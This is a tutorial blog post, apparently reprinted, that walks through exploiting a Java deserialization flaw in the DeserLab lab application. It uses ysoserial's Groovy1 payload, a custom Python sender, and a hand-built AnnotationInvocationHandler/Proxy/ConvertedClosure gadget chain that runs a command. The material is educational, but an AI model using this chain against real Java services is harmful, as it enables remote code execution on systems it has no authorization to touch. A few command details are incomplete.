Java deserialization vulnerabilities: from understanding to practice

Posted by punzalan at 2020-02-29

I. Preface

When learning something new, we need to keep reminding ourselves that what we pick up from reading alone stays shallow; to really know something, we have to do it ourselves. That is why we should practice as we learn. In this article we take a close look at the well-known Java deserialization vulnerabilities. For us, the best practice is to truly understand the material at hand, so that we can adapt and improve on it as the situation requires. The article covers the following two topics:

1. Exploit a deserialization vulnerability.

2. Create and use the payload manually.

More specifically, we first use existing tools to exploit a deserialization vulnerability in practice and explain what each step means. We then take a closer look at the payload: what it is and how to build one by hand. After these steps we should fully understand how the payload works, and know how to approach similar vulnerabilities in the future.

All the tools used along the way are mentioned in this article, but I suggest you first get to know this one: DeserLab.

The tool contains the vulnerability we are going to practice on. We use a simulated vulnerability rather than a real target because we control every aspect of it, which makes it easier to understand how exploiting a deserialization vulnerability works.

II. Exploiting the DeserLab vulnerability

First, read the article written by Nick that introduces DeserLab and Java deserialization; it describes the Java serialization protocol in detail. After reading it, you should be able to set up the DeserLab environment yourself. We will also need several precompiled jar tools, which can be downloaded from GitHub beforehand. Now let's get to the point.

When I face a problem, I usually start by understanding how the target works under normal conditions. For DeserLab, that means doing the following:

Run the server and client

Capture the traffic

Understand the traffic

We can use the following commands to run the server and client:

java -jar DeserLab.jar -server 6666
java -jar DeserLab.jar -client 6666

The results of the above commands are as follows:

java -jar DeserLab.jar -server 6666
[+] DeserServer started, listening on
[+] Connection accepted from
[+] Sending hello...
[+] Hello sent, waiting for hello from client...
[+] Hello received from client...
[+] Sending protocol version...
[+] Version sent, waiting for version from client...
[+] Client version is compatible, reading client name...
[+] Client name received: testing
[+] Hash request received, hashing: test
[+] Hash generated: 098f6bcd4621d373cade4e832627b4f6
[+] Done, terminating connection.

java -jar DeserLab.jar -client 6666
[+] DeserClient started, connecting to
[+] Connected, reading server hello packet...
[+] Hello received, sending hello to server...
[+] Hello sent, reading server protocol version...
[+] Sending supported protocol version to the server...
[+] Enter a client name to send to the server: testing
[+] Enter a string to hash: test
[+] Generating hash of "test"...
[+] Hash generated: 098f6bcd4621d373cade4e832627b4f6

This output is not the information we are after. What we want to know is how this environment implements deserialization. To answer that, we can capture the traffic on port 6666 with Wireshark, tcpdump or tshark. The following command captures the traffic with tcpdump:

tcpdump -i lo -n -w deserlab.pcap 'port 6666'

Before continuing, browse the pcap file in Wireshark. After reading Nick's article you should already understand what is going on, or at least be able to spot the serialized Java objects in the traffic.

2.1 Extracting serialized data

Based on the captured traffic, we can be sure that serialized data is being sent over the network. Now let's analyze exactly what is being transferred. I chose SerializationDumper, one of the tools we are going to use; it is similar to jdeserialize, an older, well-known tool that still works. Before using these tools we need to prepare the data, which means converting the pcap into a format they can analyze.

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=, | grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

The command looks long, but it works. It converts the pcap data into a single line of hex-encoded output, and it is easier to understand when broken down into parts. First, it converts the pcap to text that contains only the TCP source port, the transmitted data and the TCP destination port:

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=,

The results are as follows:

50432,,6666
6666,,50432
50432,,6666
50432,aced0005,6666
6666,,50432
6666,aced0005,50432

As the output shows, no data is transmitted during the TCP three-way handshake, which is why those lines contain ',,'. After that, the client sends its first bytes, the server answers with an ACK and then sends some bytes of its own, and so on. The second part of the command processes this text further and selects the payload lines based on the port at the beginning of each line:

| grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

This filter extracts the data sent by the server and joins it into one hex string. To extract the client's data instead, change the port number.


This is exactly the data we need: the bytes that were sent and received, in a compact form. We can process it with the two tools mentioned above, first SerializationDumper and then jdeserialize. Using more than one tool for the same task helps us spot potential errors or problems; if you stick to a single tool, you may end up in a dead end without noticing. Besides, trying different tools is fun in itself.
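The filtering done by the grep, cut, tr and sed steps can also be sketched in Python. This is only an illustration of the logic, not part of the original toolchain; the function name `extract_hex` is made up, and the sample lines are the tshark output shown above.

```python
def extract_hex(tshark_lines, src_port="6666"):
    """Concatenate the hex payloads of all packets sent from src_port."""
    chunks = []
    for line in tshark_lines:
        fields = line.strip().split(",")
        if len(fields) != 3:
            continue  # skip malformed or empty lines
        sport, data, _dport = fields
        # Keep only packets that carry data and come from the chosen port.
        if sport == src_port and data:
            # Some tshark versions print the bytes colon-separated.
            chunks.append(data.replace(":", ""))
    return "".join(chunks)


sample = [
    "50432,,6666",
    "6666,,50432",
    "50432,,6666",
    "50432,aced0005,6666",
    "6666,,50432",
    "6666,aced0005,50432",
]
print(extract_hex(sample))           # data sent by the server
print(extract_hex(sample, "50432"))  # data sent by the client
```

Passing a different `src_port` corresponds to changing the port number in the grep expression.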

2.2 Analyzing serialized data

SerializationDumper is simple to use. We pass the serialized data in hexadecimal form as the first argument, as shown below:

java -jar SerializationDumper-v1.0.jar aced00057704f000baaa77020101

The results are as follows:

STREAM_MAGIC - 0xac ed
STREAM_VERSION - 0x00 05
Contents
  TC_BLOCKDATA - 0x77
    Length - 4 - 0x04
    Contents - 0xf000baaa
  TC_BLOCKDATA - 0x77
    Length - 2 - 0x02
    Contents - 0x0101
  TC_OBJECT - 0x73
    TC_CLASSDESC - 0x72
      className
        Length - 20 - 0x00 14
        Value - nb.deser.HashRequest - 0x6e622e64657365722e4861736852657175657374
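To make the framing in this dump concrete, here is a small Python sketch that reads the stream header and the TC_BLOCKDATA records from the shortened hex string passed to SerializationDumper above. It handles only this one record type and is in no way a replacement for the tool; the function name `parse_blocks` is made up for illustration.

```python
import struct

STREAM_MAGIC = 0xACED
TC_BLOCKDATA = 0x77


def parse_blocks(hex_stream):
    """Return (version, [block bytes]) for a stream of TC_BLOCKDATA records."""
    raw = bytes.fromhex(hex_stream)
    magic, version = struct.unpack(">HH", raw[:4])
    if magic != STREAM_MAGIC:
        raise ValueError("not a Java serialization stream")
    blocks = []
    pos = 4
    # Read consecutive block-data records; stop at the first other type code.
    while pos < len(raw) and raw[pos] == TC_BLOCKDATA:
        length = raw[pos + 1]  # TC_BLOCKDATA uses a one-byte length
        blocks.append(raw[pos + 2 : pos + 2 + length])
        pos += 2 + length
    return version, blocks


version, blocks = parse_blocks("aced00057704f000baaa77020101")
print(version)                    # 5
print([b.hex() for b in blocks])  # ['f000baaa', '0101']
```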

jdeserialize has to be compiled before use. This can be done with ant and the provided build.xml file, but I chose to compile it manually with the following commands:

mkdir build
javac -d ./build/ src/*
cd build
jar cvf jdeserialize.jar *

These commands produce a jar file. To check that it was built correctly, run the following command, which prints the help information:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize

jdeserialize needs an input file, so we can use a tool such as Python to save the hex-encoded serialized data as a binary file, rawser.bin in this case (I shortened the hexadecimal string for readability).
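One way to do this in Python 3 is sketched below. It is not the author's original snippet; the helper name `save_hex` is made up, and the hex string is the shortened stream used earlier, to be replaced with the full string from the capture.

```python
import binascii


def save_hex(hex_string, path):
    """Decode a hex string and write the raw bytes to path."""
    raw = binascii.unhexlify(hex_string.strip())
    with open(path, "wb") as handle:
        handle.write(raw)
    return len(raw)  # number of bytes written


if __name__ == "__main__":
    # Shortened example stream; use the full hex string from the capture here.
    written = save_hex("aced00057704f000baaa77020101", "rawser.bin")
    print("wrote", written, "bytes to rawser.bin")
```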


Next, we pass the name of this file as the first argument to jdeserialize. The output is as follows:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize rawser.bin
read: [blockdata 0x00: 4 bytes]
read: [blockdata 0x00: 2 bytes]
read: nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
//// BEGIN stream content output
[blockdata 0x00: 4 bytes]
[blockdata 0x00: 2 bytes]
nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
//// END stream content output

//// BEGIN class declarations (excluding array classes)
class nb.deser.HashRequest implements {
    java.lang.String dataToHash;
    java.lang.String theHash;
}
//// END class declarations

//// BEGIN instance dump
[instance 0x7e0002: 0x7e0000/nb.deser.HashRequest
  field data:
    0x7e0000/nb.deser.HashRequest:
        dataToHash: r0x7e0003: [String 0x7e0003: "test"]
        theHash: r0x7e0004: [String 0x7e0004: "098f6bcd4621d373cade4e832627b4f6"]
]
//// END instance dump

The output of both tools first of all confirms that this really is serialized data. Second, it confirms that an "nb.deser.HashRequest" object is transferred between the client and the server. Combining the tool output with the Wireshark capture, we can also see that the user name is sent as a string inside a TC_BLOCKDATA element:

TC_BLOCKDATA - 0x77
  Length - 9 - 0x09
  Contents - 0x000774657374696e67

>>> bytes.fromhex('000774657374696e67')
b'\x00\x07testing'
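The two leading bytes 0x0007 look like a length prefix for the seven characters of "testing". Assuming the name was written in the usual Java writeUTF layout (a two-byte big-endian length followed by the string bytes), which the source does not state explicitly, the block can be decoded with a short sketch like this; the function name `read_utf` is made up for illustration.

```python
import struct


def read_utf(block):
    """Decode a 2-byte big-endian length followed by that many string bytes."""
    (length,) = struct.unpack(">H", block[:2])
    text = block[2 : 2 + length]
    if len(text) != length:
        raise ValueError("block is shorter than its length prefix")
    # Plain ASCII decodes identically as UTF-8 and as Java's modified UTF-8.
    return text.decode("utf-8")


print(read_utf(bytes.fromhex("000774657374696e67")))  # testing
```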

We are now familiar with the way the DeserLab client and server communicate. Next, we can use ysoserial to exploit this process.

2.3 Exploiting the vulnerability in DeserLab

Based on the analysis of the pcap and the serialized data, we understand the communication of the whole environment well enough to write our own Python script that embeds a ysoserial payload. To keep the code simple and easy to match against the Wireshark data stream, I implemented it so that it follows that stream step by step:

mydeser = deser(myargs.targetip, myargs.targetport)
mydeser.connect()
mydeser.javaserial()
mydeser.protohello()
mydeser.protoversion()
mydeser.clientname()
mydeser.exploit(myargs.payloadfile)

You can find the full version of the code here. As you can see, the easiest approach is to hard-code all of the Java deserialization exchange data. You may wonder about some details, such as why 'mydeser.exploit(myargs.payloadfile)' comes after 'mydeser.clientname()', and how I decided where it should go. So let me explain my reasoning and, along the way, how to generate and send a ysoserial payload.
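As an illustration of what hard-coding the exchange data involves, the sketch below builds the byte sequences for the individual steps. It is not the author's script. The helper names `blockdata` and `utf_string` are made up, the hello and version values are the ones seen in the server's stream in section 2.2, and the assumption that the client sends the same values is mine.

```python
import struct

STREAM_HEADER = bytes.fromhex("aced0005")  # STREAM_MAGIC + STREAM_VERSION
TC_BLOCKDATA = 0x77


def blockdata(payload):
    """Wrap payload in a TC_BLOCKDATA record (one-byte length, max 255 bytes)."""
    if len(payload) > 255:
        raise ValueError("TC_BLOCKDATA holds at most 255 bytes")
    return bytes([TC_BLOCKDATA, len(payload)]) + payload


def utf_string(text):
    """Encode text with a 2-byte big-endian length prefix."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


hello = blockdata(bytes.fromhex("f000baaa"))  # assumed same value as the server's
version = blockdata(bytes.fromhex("0101"))    # assumed same value as the server's
name = blockdata(utf_string("testing"))
print(STREAM_HEADER.hex(), hello.hex(), version.hex(), name.hex())
```

The last frame, 7709000774657374696e67, matches the client name block shown in section 2.2.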

After reading several articles on Java deserialization (see resources for this article), I summarized two ideas:

1. Most of the vulnerabilities are related to the deserialization of Java objects;

2. Most of the vulnerabilities are related to deserialization of Java objects.

Just kidding. The point is that if we inspect the exchange between the server and the client, somewhere in it we should find Java objects being exchanged. This is easy to spot in the analysis of the serialized data, because the output either contains "TC_OBJECT - 0x73" or contains the following:

//// BEGIN stream content output
[blockdata 0x00: 4 bytes]
[blockdata 0x00: 2 bytes]
[blockdata 0x00: 9 bytes]
nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
//// END stream content output

From this output we can see that the last part of the stream is the "nb.deser.HashRequest" object. The object is read at the very end of the exchange, which explains why the exploit function is called last in the code. Now that we know where the exploit payload has to go, how do we generate and send it?

The DeserLab code itself does not contain anything we can exploit. The reasons will be explained below; for now we simply accept this. It means we have to look in other libraries for code that can help us. DeserLab ships with only one library, Groovy, which is a big enough hint for choosing the ysoserial payload. In the real world, we often have to disassemble unknown libraries ourselves to find useful code, also known as gadgets.

Once we know which library is available, generating the payload is very simple. The command is as follows:

java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping' > payload.bin

Note that nothing is returned after the payload is sent, so we need some other way to confirm that it worked. In a lab environment a ping to localhost is enough, but in a real environment we need to find a better method.

Now everything is ready. Can we just send the payload and be done? Almost, but remember that the Java serialization header has already been exchanged at that point. This means we have to strip the first four bytes (the header) from the payload before sending it:

./ 6666 payload_ping_localhost.bin
2017-09-07 22:58:05,401 - INFO - Connecting
2017-09-07 22:58:05,401 - INFO - java serialization handshake
2017-09-07 22:58:05,403 - INFO - protocol specific handshake
2017-09-07 22:58:05,492 - INFO - protocol specific version handshake
2017-09-07 22:58:05,571 - INFO - sending name of connected client
2017-09-07 22:58:05,571 - INFO - exploiting
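The header stripping mentioned above can be sketched in Python as follows. This is a minimal illustration, not the author's script; the function name `strip_stream_header` is made up and the demo bytes are a stand-in, not a real ysoserial payload.

```python
STREAM_HEADER = bytes.fromhex("aced0005")  # STREAM_MAGIC + STREAM_VERSION


def strip_stream_header(payload):
    """Return payload without its leading 4-byte serialization header."""
    if not payload.startswith(STREAM_HEADER):
        raise ValueError("payload does not start with aced0005")
    return payload[len(STREAM_HEADER):]


# Stand-in bytes for illustration only, not a real ysoserial payload.
demo = bytes.fromhex("aced00057372")
print(strip_stream_header(demo).hex())  # 7372
```

Checking for the header before removing it guards against sending a file that was already stripped or is not a serialization stream at all.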

If all goes well, you can see the following output:

sudo tcpdump -i lo icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
22:58:06.215178 IP localhost > localhost: ICMP echo request, id 31636, seq 1, length 64
22:58:06.215187 IP localhost > localhost: ICMP echo reply, id 31636, seq 1, length 64
22:58:07.215374 IP localhost > localhost: ICMP echo request, id 31636, seq 2, length 64

Very good. We have successfully exploited the DeserLab vulnerability. Next, we need to understand what exactly the payload we sent to DeserLab contains.

III. Building the payload manually

The best way to understand how the payload works is to rebuild exactly the same payload by hand, which means writing Java code. The question is where to start. As we did with the pcap, let's look at the serialized payload. We can convert the payload to a hexadecimal string and analyze it with SerializationDumper, or analyze the file directly with jdeserialize if you prefer.
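One way to get the hexadecimal string is a few lines of Python 3, sketched below. The function name `file_to_hex` and the script name tohex.py are made up for illustration; any hex dump tool that prints a single unbroken string would do just as well.

```python
import sys


def file_to_hex(path):
    """Read a binary file and return its contents as one hex string."""
    with open(path, "rb") as handle:
        return handle.read().hex()


# Usage (hypothetical script name): python3 tohex.py payload.bin
if __name__ == "__main__" and len(sys.argv) == 2:
    print(file_to_hex(sys.argv[1]))
```

The printed string can be passed to SerializationDumper as its first argument, in the same way as in section 2.2.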


Now we can dig in and work out how it all fits together. As it happens, after figuring all of this out I found another article that explains the whole process in detail, so you can skip this part and read that article instead if you like. What follows focuses on my own approach. Reading the source code of the ysoserial exploit was a very important part of it. I will not keep repeating that: whenever you wonder how I worked out a particular step, the answer is the ysoserial implementation.

When the payload is passed to the tools, both of them produce very long output containing all kinds of Java classes. The one we care about most is the first class in the output, "sun.reflect.annotation.AnnotationInvocationHandler". This class may look familiar, because it is the entry point of many deserialization exploits. I also noticed "java.lang.reflect.Proxy", "org.codehaus.groovy.runtime.ConvertedClosure" and "org.codehaus.groovy.runtime.MethodClosure". These classes caught my attention because they reference the library we use to exploit the vulnerability, because they are mentioned in online articles about exploiting Java deserialization, and because I had seen them in the ysoserial source code.

There is one important concept to keep in mind: in a deserialization attack, what you send is really the "saved" state of an object. You therefore depend entirely on the behavior of the receiver, or more precisely on what the receiver does while deserializing the "saved" state you sent. If the other end never calls a method on the objects you send, you cannot achieve remote code execution. The only thing you control is the properties of the objects involved.

With that in mind, we know that to achieve code execution, some method of the first class we send has to be called automatically, which explains why the first class is so important. If we look at the code of AnnotationInvocationHandler, we see that its constructor accepts a java.util.Map object and that its readObject method calls a method on that Map. If you have read other articles, you know that readObject is called automatically when the stream is deserialized. Based on this, and borrowing from the code in other articles, we can start building our own exploit code as shown below. To follow the code, it helps to read up on Java reflection first.

import java.lang.reflect.Constructor;

public class ManualPayloadGenerateBlog {
    public static void main(String[] args) throws Exception {
        //this is the first class that will be deserialized
        String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";
        //access the constructor of the AnnotationInvocationHandler class
        final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
        //normally the constructor is not accessible, so we need to make it accessible
        constructor.setAccessible(true);
    }
}

You can use the following command to compile and run this code, although it has no actual function at present:

javac ManualPayloadGenerateBlog.java
java ManualPayloadGenerateBlog

As you expand the capabilities of this code, keep the following in mind:

Search for the error message as soon as you run into an error;

The class name must match the file name;

It helps to be familiar with the Java language.

The code above gives us the entry-point class and its constructor, but which arguments do we pass to the constructor? Most examples use the following line:

constructor.newInstance(Override.class, map); 

As I understand it, the "map" argument matters because the "entrySet" method of the Map object is called during the initial readObject call. I do not fully understand the inner workings of the first argument, but I do know that readObject checks it to make sure it is of type "AnnotationType". We pass the "Override" class, which satisfies that requirement.

Now for the important part. To understand how this works, note that the second argument is not a plain Java Map object but a Java proxy object. When I first ran into this, I did not understand what it meant. There is an article that covers the Java dynamic proxy mechanism in detail and provides very good example code. An excerpt:

"With the dynamic proxy mechanism, a single class with a single method can serve multiple method calls to arbitrary classes with any number of methods. A dynamic proxy works like a facade, but one that can pretend to be an implementation of any interface. Under the cover, it routes all method invocations to a single handler, the invoke() method."

Put simply, a proxy object can pretend to be a Java Map object and route every call made on that Map to a method of another class.
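Java's dynamic proxy has no direct counterpart in Python, but the routing idea can be illustrated with a loose analogy built on `__getattr__`. The sketch below is only that, an analogy: the classes `LoggingHandler` and `FakeMap` are made up, and nothing here reproduces the behavior of java.lang.reflect.Proxy beyond "every call ends up in one invoke method".

```python
class LoggingHandler:
    """Plays the role of an InvocationHandler: one method sees every call."""

    def __init__(self):
        self.calls = []

    def invoke(self, method_name, args):
        self.calls.append((method_name, args))
        return "handled " + method_name


class FakeMap:
    """Pretends to offer any method and forwards each call to the handler."""

    def __init__(self, handler):
        self._handler = handler

    def __getattr__(self, method_name):
        # Called only for attributes that do not exist on the object,
        # which here means every "map" method the caller asks for.
        def forward(*args):
            return self._handler.invoke(method_name, args)
        return forward


handler = LoggingHandler()
fake_map = FakeMap(handler)
print(fake_map.entrySet())  # handled entrySet
print(fake_map.get("key"))  # handled get
print(handler.calls)        # [('entrySet', ()), ('get', ('key',))]
```

The caller believes it is talking to a map, while the handler alone decides what each call actually does. That is the property the payload relies on.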

This means that we can use this map object to expand our code as follows:

final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, <unknown-invocationhandler>); 

Note that we still have to supply the InvocationHandler, which is not filled in yet. This slot is eventually filled by Groovy; up to this point we have only been dealing with ordinary Java classes. Groovy fits here because it contains an InvocationHandler. When that InvocationHandler is invoked, it eventually leads to code execution, as shown below:

final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, closure);

As you can see, the InvocationHandler slot is now filled with a ConvertedClosure object. You can confirm that this works by decompiling the Groovy library. Looking at the ConvertedClosure class, you can see that it extends the ConversionHandler class. Decompiling that class shows the following declaration:

public abstract class ConversionHandler implements InvocationHandler, Serializable

The declaration shows that ConversionHandler implements InvocationHandler, which is why we can use it in a proxy object. What I did not understand at the time was how the Groovy payload gets from the Map proxy to code execution. You can browse the Groovy library with a decompiler, but I often find it more efficient to search Google for the key information. In this case, for example, we can search for:

“groovy execute shell command”

This search turns up many articles that explain the matter, such as this article and this article. Their point is that the String object has an additional method called "execute". I often use this kind of search for environments I am not familiar with, because executing shell commands is a common need for developers and the answer can usually be found online. With this understood, the complete chain of the payload is: deserialization calls readObject on AnnotationInvocationHandler, which calls entrySet on the Map; the Map is a proxy, so the call is routed to the ConvertedClosure handler, which ends in a call to the "execute" method of the command string.

You can go to this link to get the full version of the code, and then compile and run it with the following command:

javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java
java -cp .:DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate > payload_manual.bin

Running this code should give us the same result as the ysoserial payload. To my surprise, even the hashes of the two payloads are identical:

sha256sum payload_ping_localhost.bin payload_manual.bin
4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_ping_localhost.bin
4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_manual.bin

Thank you for reading. I hope this article helps you better understand how exploitation works the next time you deal with a Java deserialization vulnerability.

*This article is reprinted from safe guest